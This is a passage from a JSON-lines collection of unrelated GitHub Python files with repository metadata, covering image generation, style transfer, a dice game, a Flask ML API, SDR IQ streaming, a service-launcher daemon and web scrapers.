data[\"label\"]\n #x_cassava[counter] = image\n y_cassava[counter] = label\n counter += 1\n\n if counter == num_images:\n print('All {} images and labels converted to NumPy arrays'.format(split_name))\n\n return y_cassava","repo_name":"liamcarew/cassava-leaf-disease-classification","sub_path":"image_pre_processing/utils/convert_to_np_array.py","file_name":"convert_to_np_array.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27712878815","text":"import torch\nfrom diffusers import DiffusionPipeline\n\ndef genSingle(pipeline: DiffusionPipeline, prompt: str | None = None, width: int = 512, height: int = 512, samples: int = 50, negativePrompt: str | None = None):\n image = pipeline(prompt=prompt, negative_prompt=negativePrompt, width=width, height=height, num_inference_steps=samples).images[0]\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n return image\n\ndef genMultiple(pipeline: DiffusionPipeline, prompt: str | None = None, negativePrompt: str | None = None, width: int = 512, height: int = 512, samples: int = 50, count: int = 10):\n images = []\n for i in range(count):\n images.append(genSingle(pipeline, prompt, width, height, samples, negativePrompt))\n return images","repo_name":"Cr0me1ve/easyStableDiffusionXL","sub_path":"scripts/runSD.py","file_name":"runSD.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40358864649","text":"from PyQt6.QtWidgets import (\n QMainWindow,\n QLabel,\n QSpinBox,\n QPushButton,\n QTableWidget,\n)\nfrom project.form.constants import (\n WIDTH,\n HEIGHT,\n LEFT,\n)\nfrom project.form.base_object import Object\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Simulation: Discrete-event modeling\")\n self.setGeometry(350, 300, WIDTH, HEIGHT)\n\n self.obj: Object = Object()\n self.create_objects()\n\n def create_objects(self):\n labels: list[str] = ['Number of operators', 'Average customers', 'Service scale']\n for label in labels:\n self.obj.set_obj(\n object=QLabel(self),\n title=label,\n above=self.obj.indent,\n case=0,\n )\n\n self.obj.add_obj(\n self.obj.set_obj(\n object=QSpinBox(self),\n above=self.obj.indent,\n left=LEFT * 10,\n step=1,\n span=[0, 100000000],\n value=5,\n ),\n key='spinbox',\n )\n self.obj.increase_indent()\n self.obj.increase_indent()\n\n self.obj.add_obj(\n self.obj.set_obj(\n object=QPushButton(self),\n title='Start/Stop',\n above=self.obj.indent,\n left=LEFT * 3,\n ),\n key='button',\n )\n self.obj.add_obj(\n self.obj.set_obj(\n object=QTableWidget(),\n columns=4,\n title='Bank simulation',\n values=['event type', 'event time', 'queue', 'free operators'],\n width=WIDTH,\n ),\n key='table',\n )\n","repo_name":"BigBlackBob-93/Simulation--DiscreteEventModeling--Queue","sub_path":"project/form/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2821603969","text":"# Starting with a clean slate\n\nfrom modal import Secret, Stub, Image, gpu, method\n\nARTFUSION_GITHUB_PATH = \"https://github.com/cadolphs/ArtFusion.git\"\nARTFUSION_PATH = \"/git/artfusion/\"\nMODEL_DIR = \"/models\"\nMODEL_NAME = \"artfusion_r12_step=317673.ckpt\"\nBASE_MODEL = \"lagerbaer/artfusion\"\nCKPT_PATH = f\"{MODEL_DIR}/{MODEL_NAME}\"\nCFG_PATH = f\"{ARTFUSION_PATH}/configs/kl16_content12.yaml\"\nDEVICE = \"cuda\"\n\nstub = Stub(\"art-fusion\")\n\n\ndef download_model_to_folder():\n from huggingface_hub import snapshot_download\n import os\n\n os.makedirs(MODEL_DIR, exist_ok=True)\n\n snapshot_download(\n BASE_MODEL,\n local_dir=MODEL_DIR,\n token=os.environ[\"HUGGINGFACE_TOKEN\"],\n )\n\n\ndef instantiate_model():\n \"\"\"Useful to pre-load the required weights\"\"\"\n import sys\n\n sys.path.append(ARTFUSION_PATH)\n from omegaconf import OmegaConf\n from main import instantiate_from_config\n\n config = OmegaConf.load(CFG_PATH)\n config.model.params.ckpt_path = CKPT_PATH\n config.model.params.first_stage_config.params.ckpt_path = None\n model = instantiate_from_config(config.model)\n\n\nimage = (\n Image.debian_slim()\n .apt_install(\"python3-opencv\")\n .pip_install(\n \"torch\",\n \"torchvision\",\n \"pytorch-lightning\",\n \"omegaconf\",\n \"einops\",\n \"transformers\",\n \"imageio\",\n \"imageio-ffmpeg\",\n \"hf-transfer~=0.1\",\n )\n .apt_install(\"git\")\n .run_commands(\n f\"cd / && mkdir -p {ARTFUSION_PATH} && cd {ARTFUSION_PATH} && git clone --depth 1 {ARTFUSION_GITHUB_PATH} .\",\n force_build=False,\n )\n .run_commands(f\"cd / && mkdir -p {MODEL_DIR}\")\n .run_function(\n download_model_to_folder, secret=Secret.from_name(\"my-huggingface-secret\")\n )\n .run_function(instantiate_model)\n)\n\n\ndef preprocess_image(image, size=(256, 256), max_size=256):\n import numpy as np\n import torch\n from einops import rearrange\n\n if not image.mode == \"RGB\":\n image = image.convert(\"RGB\")\n image.thumbnail((max_size, max_size))\n image = np.array(image).astype(np.uint8)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = rearrange(image, \"h w c -> c h w\")\n return torch.from_numpy(image)[None, :].to(DEVICE)\n\n\ndef tensor_to_rgb(x):\n import torch\n\n return torch.clamp((x + 1.0) / 2.0, min=0.0, max=1.0)\n\n\ndef convert_samples(samples):\n from einops import rearrange\n from PIL import Image\n import numpy as np\n\n if isinstance(samples, (list, tuple)):\n samples = torch.cat(samples, dim=0)\n\n samples = rearrange(samples[0, :], \"c h w -> h w c\").cpu().numpy() * 255.0\n samples = Image.fromarray(samples.astype(np.uint8))\n return samples\n\n\n@stub.cls(image=image, gpu=gpu.Any())\nclass StyleTransfer:\n def __enter__(self):\n from omegaconf import OmegaConf\n from pytorch_lightning import seed_everything\n import sys\n\n sys.path.append(ARTFUSION_PATH)\n from main import instantiate_from_config\n\n seed_everything(42)\n\n config = OmegaConf.load(CFG_PATH)\n config.model.params.ckpt_path = CKPT_PATH\n config.model.params.first_stage_config.params.ckpt_path = None\n model = instantiate_from_config(config.model)\n\n self.model = model.eval().to(DEVICE)\n\n def get_content_style_features(\n self, content_image, style_image, max_size=256, style_size=256\n ):\n import torch\n\n model = self.model\n style_image = preprocess_image(style_image, max_size=style_size)\n content_image = preprocess_image(content_image, max_size=max_size)\n\n with torch.no_grad(), model.ema_scope(\"Plotting\"):\n vgg_features = model.vgg(model.vgg_scaling_layer(style_image))\n c_style = model.get_style_features(vgg_features)\n null_style = c_style.clone()\n null_style[:] = model.null_style_vector.weight[0]\n\n content_encoder_posterior = model.encode_first_stage(content_image)\n content_encoder_posterior = model.get_first_stage_encoding(\n content_encoder_posterior\n )\n c_content = model.get_content_features(content_encoder_posterior)\n null_content = torch.zeros_like(c_content)\n\n c = {\"c1\": c_content, \"c2\": c_style}\n c_null_style = {\"c1\": c_content, \"c2\": null_style}\n c_null_content = {\"c1\": null_content, \"c2\": c_style}\n\n return c, c_null_style, c_null_content\n\n def style_transfer(\n self,\n content_image,\n style_image,\n content_s,\n style_s,\n ddim_steps,\n eta,\n max_size=None,\n style_size=None,\n ):\n import torch\n\n c, c_null_style, c_null_content = self.get_content_style_features(\n content_image, style_image, max_size=max_size, style_size=style_size\n )\n\n with torch.no_grad(), self.model.ema_scope(\"Plotting\"):\n samples = self.model.sample_log(\n cond=c,\n batch_size=1,\n x_T=torch.rand_like(c[\"c1\"]),\n ddim=True,\n ddim_steps=ddim_steps,\n eta=eta,\n unconditional_guidance_scale=content_s,\n unconditional_conditioning=c_null_content,\n unconditional_guidance_scale_2=style_s,\n unconditional_conditioning_2=c_null_style,\n )[0]\n\n x_samples = self.model.decode_first_stage(samples)\n x_samples = tensor_to_rgb(x_samples)\n\n return x_samples\n\n @method()\n def generate(\n self,\n content_bytes=None,\n style_bytes=None,\n content_strength=0.5,\n style_strength=1.0,\n max_size=256,\n style_size=256,\n ddim_steps=10,\n eta=0,\n ):\n from PIL import Image\n\n import io\n\n content_image = Image.open(io.BytesIO(content_bytes))\n style_image = Image.open(io.BytesIO(style_bytes))\n\n x_samples = self.style_transfer(\n content_image,\n style_image,\n content_s=content_strength,\n style_s=style_strength,\n max_size=max_size,\n style_size=style_size,\n ddim_steps=ddim_steps,\n eta=eta,\n )\n\n x_samples = convert_samples(x_samples)\n\n img_bytes = io.BytesIO()\n x_samples.save(img_bytes, format=\"PNG\")\n\n return img_bytes.getvalue()\n\n\n@stub.local_entrypoint()\ndef main(\n content_file_name: str,\n style_file_name: str,\n content_strength: float = 0.5,\n style_strength: float = 1.0,\n max_size: int = 512,\n style_size: int = 256,\n eta: float = 0,\n ddim_steps: int = 10,\n):\n import io\n\n with open(content_file_name, \"rb\") as f:\n content_bytes = io.BytesIO(f.read()).getvalue()\n with open(style_file_name, \"rb\") as f:\n style_bytes = io.BytesIO(f.read()).getvalue()\n\n image_bytes = StyleTransfer().generate.remote(\n content_bytes,\n style_bytes,\n content_strength=content_strength,\n style_strength=style_strength,\n max_size=max_size,\n style_size=style_size,\n eta=eta,\n ddim_steps=ddim_steps,\n )\n output_path = \"output.png\"\n with open(output_path, \"wb\") as f:\n f.write(image_bytes)\n","repo_name":"cadolphs/style-transfer","sub_path":"simple_script.py","file_name":"simple_script.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6263741417","text":"from items import*\nimport random\n\nclass dice(clickable):\n def __init__(self,x,y,w,h,name, val ,backgroundColor = color(255)):\n super(dice, self).__init__(x,y,w,h,name,backgroundColor = backgroundColor)\n self.val=val\n \n def display(self): \n fill(255)\n if self.val == 1:\n self.diceOne()\n if self.val == 2:\n self.diceTwo()\n if self.val == 3:\n self.diceThree()\n if self.val == 4:\n self.diceFour()\n if self.val == 5:\n self.diceFive()\n if self.val == 6:\n self.diceSix()\n \n def onClick(self, *args):\n self.diceRoll()\n \n def onHover(self):\n pass\n \n def diceRoll(self):\n self.val = random.randint(1,6) \n \n def diceOne(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n \n def diceTwo(self):\n fill(self.backgroundColor)\n rect(self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n \n def diceThree(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n \n def diceFour(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n \n \n def diceFive(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n \n \n def diceSix(self): \n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.5 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.5 * self.h, 0.2*self.w, 0.2*self.h)\n \n def copy(self):\n return dice(self.x,self.y,self.w,self.h,self.name,self.val,self.backgroundColor)\n \nclass diceGroup(clickable): \n def __init__(self,x,y,w,h,name, *dice):\n super(diceGroup, self).__init__(x,y,w,h,name)\n self.dice=list()\n self._observers = []\n for d in dice: \n self.dice.append(d)\n \n def display(self):\n for d in self.dice:\n d.display()\n \n def onClick(self):\n for d in self.dice:\n d.onClick()\n \n def addDice(self,d):\n if isinstance(dice,d):\n self.dice.append(d)\n \n def bindTo(self,callback):\n self._observers.append(callback)\n \n\n#some secific items I made for the setup screen\nclass setupDice(dice):\n def __init__(self, x,y,w,h,name, val, backgroundColor = color(255)):\n super(setupDice, self).__init__(x,y,w,h,name, val,backgroundColor = backgroundColor)\n self.active = None\n \nclass setupDiceGroup(diceGroup):\n def __init__(self,x,y,w,h,name,game,*dice):\n super(setupDiceGroup,self).__init__(x,y,w,h,name,*dice)\n self.results = []\n self.amountActive = 2\n self.winningDice = 0\n self.game = game\n self.changeAmount(2)\n \n def onClick(self):\n self.winningDice = 0\n self.results = []\n for d in self.dice:\n if d.active:\n d.onClick()\n self.results.append(d.val)\n try: \n self.winningDice = self.results.index(max(self.results))\n except:\n self.winningDice = 0\n self.game._currentPlayer = self.game.setPlayer(self.game.players[self.winningDice])\n self.game.currentPlayerIndex = self.winningDice\n \n def changeAmount(self, amount):\n if amount == 2:\n self.amountActive = 2\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = False\n self.dice[3].active = False\n elif amount == 3:\n self.amountActive = 3\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = True\n self.dice[3].active = False\n else:\n self.amountActive = 4\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = True\n self.dice[3].active = True\n \n def display(self):\n for d in self.dice:\n if d.active:\n d.display()\n \nclass varDiceGroup(diceGroup):\n def __init__(self,x,y,w,h,name,parents,attrname,function,*dice):\n super(varDiceGroup,self).__init__(x,y,w,h,name,*dice)\n self.amount = 0\n self.parents = parents\n self.attrname = attrname\n for x in self.parents:\n x.bindTo(self.update)\n self.function = function\n self.sum = 0\n \n def update(self, value):\n self.amount = getattr(value,self.attrname)\n self.resetDice()\n \n def resetDice(self):\n self.dice = list()\n for x in range(self.amount):\n d = dice(self.x + 100*x,self.y,100,100,'',1)\n self.dice.append(d.copy())\n \n def onClick(self):\n self.sum = 0\n for d in self.dice:\n d.onClick()\n self.sum += d.val\n for callback in self._observers:\n callback(self) \n self.function(self.sum)\n \n \n \n \n\n \n \n \n","repo_name":"QuintenVerheij/digitalComponent","sub_path":"digitalComponent/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":7051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30198586695","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_api import status\nfrom flask_cors import CORS\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n# Importing machine learning model\n\nimport spacy, nltk\nfrom model.movie_recommender import MovieRecommendation\nfrom sklearn.feature_extraction.text import CountVectorizer\nnlp = spacy.load('en_core_web_sm')\nstop_words = nlp.Defaults.stop_words\nps = nltk.PorterStemmer()\n\napp = Flask(__name__)\nMovieRecommendation()\nmovieRecommendation = pickle.load(open('./model/model.pkl','rb'))\nspam_classifier = pickle.load(open('./model/spam_classifier.pkl','rb'))\n\nCORS(app)\n\n@app.route('/api/get')\ndef get_data():\n return jsonify(posts)\n\n\n@app.route('/api/recommended-movie', methods=['POST', 'GET'])\ndef get_recommendation():\n movie = request.json['movie']\n movie_list = movieRecommendation.get_recommended_movies(movie)\n\n movie_list = dict(movie_list)\n if movie_list['success'] == True:\n return movie_list, status.HTTP_200_OK\n else:\n return movie_list, status.HTTP_500_INTERNAL_SERVER_ERROR\n\n\n@app.route('/api/email-classifier', methods=['POST', 'GET'])\ndef classify_email():\n message = request.json['message']\n\n corpus = pd.Series([message])\n corpus = corpus.apply(lambda x: ' '.join(ps.stem(x) for term in x.split() if not term in stop_words))\n\n cv = CountVectorizer()\n X = cv.fit_transform(corpus).toarray()\n \n print(X, 'sadasdasasdas')\n prediction = spam_classifier.predict(X)\n\n print(prediction, 'value predicted')\n\n \n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"VinayDagar/flask-ml","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41474897370","text":"#!/usr/bin/env python3\n\nimport binascii\nimport serial\nimport struct\nimport time\nimport os\nimport sys\nfrom threading import Thread, Lock\n\nGPIOA = 0x00\nGPIOB = 0x01\n\nGPIO_INPUT = 0x00\nGPIO_OUTPUT = 0x10\nGPIO_MUX = 0x08\nGPIO_ANALOG = 0x03\n\nGPIO_PULL_NONE = 0x04\nGPIO_PULL_UP = 0x18\nGPIO_PULL_DOWN = 0x28\n\nCFG_GPIO_PIN = 0x1000\nCFG_DMA = 0x1001\nCFG_ADC = 0x1002\nTRIGGER_ADC = 0x1003\nREAD_ADC = 0x1004\nSET_GPIO_PIN = 0x1005\n\n\nclass Command:\n\n def __init__(self, cmd_code, args=[]):\n self.cmd_code = cmd_code\n self.args = [a for a in args if a is not None]\n\n def serialize(self):\n return struct.pack(\"I%s\"%(\"I\"*len(self.args),), self.cmd_code, *self.args)\n\n\nclass Client:\n\n def __init__(self):\n self.tty = serial.Serial(\"/dev/ttyACM0\", timeout=0.2)\n\n def write(self, data):\n self.tty.write(data)\n\n def read(self, count=8):\n return self.tty.read(count)\n\n def read2(self, count, timeout):\n data = b\"\"\n start = time.time()\n while (time.time()-start) < timeout and len(data) < count:\n data += self.read(count)\n return data\n\n def configure_dma(self):\n cmd = Command(CFG_DMA, [])\n self.write(cmd.serialize())\n cmd_code, status = struct.unpack(\"II\", self.read())\n if cmd_code != CFG_DMA or status != 0:\n sys.stderr.write(\"error! configure_dma failed!\")\n sys.stderr.write(cmd_code, status)\n\n def configure_adc(self):\n cmd = Command(CFG_ADC, [])\n self.write(cmd.serialize())\n d = self.read()\n cmd_code, status = struct.unpack(\"II\", d)\n if cmd_code != CFG_ADC or status != 0:\n sys.stderr.write(\"error! configure_adc failed!\")\n sys.stderr.write(cmd_code, status)\n\n def trigger_adc(self):\n cmd = Command(TRIGGER_ADC, [])\n self.write(cmd.serialize())\n d = self.read()\n cmd_code, status = struct.unpack(\"II\", d)\n if cmd_code != TRIGGER_ADC or status != 0:\n sys.stderr.write(\"error! trigger_adc failed!\")\n sys.stderr.write(cmd_code, status)\n\n def read_adc(self):\n with open(\"output.iq\", \"wb\") as f:\n cmd = Command(READ_ADC, [])\n self.write(cmd.serialize())\n while True:\n data = self.read2(3072, 2)\n yield(data)\n f.write(data)\n f.flush()\n\n\n def configure_gpio(self, group, pin, mode, value=None):\n cmd = Command(CFG_GPIO_PIN, [group, pin, mode, value])\n pld = cmd.serialize()\n self.write(pld)\n response = self.read()\n print(response)\n cmd_code, status = struct.unpack(\"II\", response)\n if cmd_code != CFG_GPIO_PIN or status != 0:\n print(\"error! configure_gpio failed!\", file=sys.stderr)\n print(cmd_code, status, file=sys.stderr)\n\nc = Client()\n\n# ADC Inputs\nc.configure_gpio(GPIOA, 6, GPIO_ANALOG)\nc.configure_gpio(GPIOA, 7, GPIO_ANALOG)\nc.configure_gpio(GPIOB, 0, GPIO_ANALOG)\nc.configure_gpio(GPIOB, 1, GPIO_ANALOG)\n\n# c.configure_gpio(GPIOB, 2, GPIO_OUTPUT, 0)\n# c.configure_gpio(GPIOA, 9, GPIO_OUTPUT, 1)\n# c.configure_gpio(GPIOA, 10, GPIO_OUTPUT, 1)\n\nc.configure_dma()\nc.configure_adc()\nc.trigger_adc()\n\nstart = time.time()\nsample_count = 0\nfor data in c.read_adc():\n\n # unpack IQ from SC12 -> SC16\n shorts_out = []\n while len(data) >= 3:\n I = (data[0]<<4) | (data[1]>>4)\n Q = ((data[1]&0xf)<<8) | data[2]\n data = data[3:]\n shorts_out.append(I)\n shorts_out.append(Q)\n\n # complex shorts -> stdout (to eg. baudline)\n sample_count += len(shorts_out)/2\n data_out = struct.pack(\"H\"*len(shorts_out), *shorts_out)\n sys.stdout.buffer.write(data_out)\n sys.stdout.flush()\n\n # print the sample rate once per second\n if (time.time()-start) >= 1.0:\n sys.stderr.buffer.write(b\"%d samples per second\\n\" % (sample_count/(time.time()-start)))\n sys.stderr.flush()\n sample_count = 0\n start = time.time()\n","repo_name":"marcnewlin/human-detector-detector","sub_path":"stream-iq.py","file_name":"stream-iq.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"11617831484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 26 10:27:40 2016\n\n@author: Dani\n\"\"\"\n\nimport os\nimport glob\nimport re\nimport sys\n\nfrom time import sleep\n\nfrom utils import retrCwd\n\nfrom importlib import import_module, reload, invalidate_caches\n\nfrom tempfile import gettempdir as gettemp\n\nfrom daemon import Daemon\n\nfrom ServiceLogger import ServiceLogger\n\nfrom services.ServiceException import LoggerException, ScheduleException, ScriptException\n\n\ncwd = retrCwd()\nos.chdir(os.path.dirname(cwd))\nsvcdir = os.path.join(cwd, \"services\")\nsys.path.append(svcdir)\n\n\nclass ServiceLauncherDaemon(Daemon):\n \n _svc_name_ = \"PySvcLauncher\"\n _svc_display_name_ = \"Lanzador de servicios python\"\n _svc_description_ = \"Servicio de gestión de ejecución de scripts de Python\"\n \n def __init__(self, *args, **kwargs):\n Daemon.__init__(self, *args, **kwargs)\n self.logger = ServiceLogger(\"servicelauncher.log\", \"servicelauncher\", 'ServiceLauncher')\n\n def log(self, message):\n self.logger.log(message)\n \n def run(self):\n instances = {}\n modules = {}\n while 1:\n\n \"\"\" Ok, here's the real money shot right here.\n [actual service code between rests] \"\"\"\n svcscripts = glob.glob(os.path.join(svcdir, \"*Svc.py\"))\n svcscripts = [re.split(r'[\\\\/]+', s)[-1] for s in svcscripts]\n\n for script in svcscripts:\n try:\n if script not in modules.keys():\n modules.update({script: import_module(script[:-3])})\n else:\n modules[script] = reload(modules[script])\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n continue\n\n todel = []\n for script in [s for s in svcscripts if s not in instances.keys()]:\n try:\n aux_class = getattr(modules[script], script[:-6])\n instances.update({script: aux_class()})\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n if script in instances.keys():\n todel.append(script) # Service will be forced to reload Script\n continue\n self.log('\"%s\" Added to Script list' % (script,))\n\n if len(todel) > 0:\n for script in todel:\n del instances[script]\n del todel\n invalidate_caches()\n\n for script in [s for s in instances.keys() if s not in svcscripts]:\n try:\n del instances[script]\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n continue\n self.log('\"%s\" Removed from Script list' % (script,))\n\n todel = []\n for script in instances.keys():\n try:\n instances[script].run()\n except(ScriptException, LoggerException, ScheduleException) as x:\n self.log(str(x))\n todel.append(script) # Service will be forced to reload Script\n continue\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n todel.append(script) # Service will be forced to reload Script\n continue\n\n if len(todel) > 0:\n for script in todel:\n del instances[script]\n del todel\n invalidate_caches()\n\n sleep(60)\n\n \"\"\" [actual service code between rests] \"\"\"\n\n \nif __name__ == '__main__':\n daemon = ServiceLauncherDaemon(os.path.join(gettemp(), 'daemon-example.pid'))\n if len(sys.argv) == 2:\n if 'start' == sys.argv[1]:\n daemon.start()\n elif 'stop' == sys.argv[1]:\n daemon.stop()\n elif 'restart' == sys.argv[1]:\n daemon.restart()\n else:\n print(\"Unknown command\")\n sys.exit(2)\n sys.exit(0)\n else:\n print(\"usage: %s start|stop|restart\" % (sys.argv[0],))\n sys.exit(2)\n\n","repo_name":"danielperezr88/unixpythonservicelauncher","sub_path":"ServiceLauncher.py","file_name":"ServiceLauncher.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38046637629","text":"# -*- coding: utf-8 -*-\nimport itertools\n\nfrom scrapy import log\nfrom scrapy.selector import Selector\n\nfrom summaries.items import SummariesItem\n\nimport thread_float_bbs\n\n\nclass HimarinSpider(thread_float_bbs.ThreadFloatBbsSpider):\n \"\"\" for himarin.net\n \"\"\"\n name = 'himarin'\n allowed_domains = ['himarin.net']\n start_urls = ['http://himarin.net/index.rdf']\n\n def spider_page(self, response):\n \"\"\" scraping page\n \"\"\"\n sel = Selector(response)\n\n contents = []\n image_urls = []\n generator = itertools.izip(sel.css('.t_h'), sel.css('.t_b'))\n for index, (sub, body) in enumerate(generator):\n\n image_urls.extend(sub.css('img').xpath('@src').extract())\n image_urls.extend(body.css('img').xpath('@src').extract())\n\n contents.append({\n \"index\": index,\n \"subject\": sub.extract(),\n \"body\": body.extract()\n })\n\n item = dict(\n posted=False,\n source=self.extract_source(sel),\n url=response.url,\n title=self.get_text(sel.xpath('//h2')),\n tags=self.extract_tags(sel, response),\n contents=contents,\n image_urls=image_urls\n )\n # set title from source.\n return self.request_title(item['source'], SummariesItem(**item))\n\n def extract_source(self, selector):\n \"\"\" Sourceを抽出\n \"\"\"\n try:\n return [\n href for href\n in selector.css('span > a').xpath('@href').extract()\n if href.find('2ch.net') != -1\n or href.find('2ch.sc') != -1\n ][0]\n except Exception as exc:\n log.msg(\n format=(\"Extract source (error): \"\n \"Error selector %(selector)s \"\n \"url `%(url)s`: %(errormsg)s\"),\n level=log.WARNING,\n spider=self,\n selector=selector,\n url=selector.response.url,\n errormsg=str(exc))\n return None\n\n def extract_tags(self, selector, response):\n \"\"\" tagsを抽出\n \"\"\"\n try:\n feed = self.get_feed(response.url)\n tag = [\n self.get_text(tag)\n for tag in selector.css('.article-info > a')\n ][-1]\n\n return list({feed['tags'][0]['term'], tag})\n except Exception as exc:\n log.msg(\n format=(\"Extract tags (error): \"\n \"Error selector %(selector)s \"\n \"url `%(url)s`: %(errormsg)s\"),\n level=log.WARNING,\n spider=self,\n selector=selector,\n url=response.url,\n errormsg=str(exc))\n return []\n","repo_name":"ikeikeikeike/scrapy-2ch-summary-spiders","sub_path":"himarin.py","file_name":"himarin.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27729702011","text":"#This is a webscraper\r\n\r\nfrom urllib.request import Request, urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\nroot = \"https://www.google.ca/\"\r\nlink = \"https://www.google.com/search?q=health&safe=strict&rlz=1C1RXQR_koCA940CA940&sxsrf=ALeKk02GvKeIkO3ng1RJOk5x7VLdYfZPYw:1617967767469&source=lnms&tbm=nws&sa=X&ved=2ahUKEwiYtabQh_HvAhV8FlkFHcqsBGwQ_AUoA3oECAIQBQ&biw=669&bih=937\"\r\n\r\nreq = Request(link, headers={'User-Agent': 'Mozilla/5.0'})\r\nwebpage = urlopen(req).read()\r\nwith requests.Session() as c:\r\n soup = BeautifulSoup(webpage, 'html5lib')\r\n #print(soup)\r\n for item in soup.find_all('div', attrs={'class': 'ZINbbc xpd O9g5cc uUPGi'}):\r\n raw_link = (item.find('a', href=True)['href'])\r\n link = raw_link.split(\"/url?q=\")[1].split('&sa=U&')[0]\r\n #print(item)\r\n title = (item.find('div', attrs={'class': 'BNeawe vvjwJb AP7Wnd'}).get_text())\r\n description = (item.find('div', attrs={'class': 'BNeawe s3v9rd AP7Wnd'}).get_text())\r\n\r\n title = title.replace(\",\", \"\")\r\n description = description.replace(\",\", \"\")\r\n\r\n time = description.split(\" · \")[0]\r\n script = description.split(\" · \")[1]\r\n #print(title)\r\n #print(link)\r\n #print(time)\r\n #print(script)\r\n document = open(\"newsdata.csv\", \"a\")\r\n document.write(\"{}, {}, {}, {} \\n\".format(title, time, script, link))\r\n document.close()\r\n","repo_name":"HYEJI123/ICS4U-Project","sub_path":"newscrapper.py","file_name":"newscrapper.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2624039753","text":"from sklearn.base import BaseEstimator\nimport numpy as np\nimport scipy.stats as stats\nfrom collections import Counter\n# For this assignment we will implement the Naive Bayes classifier as 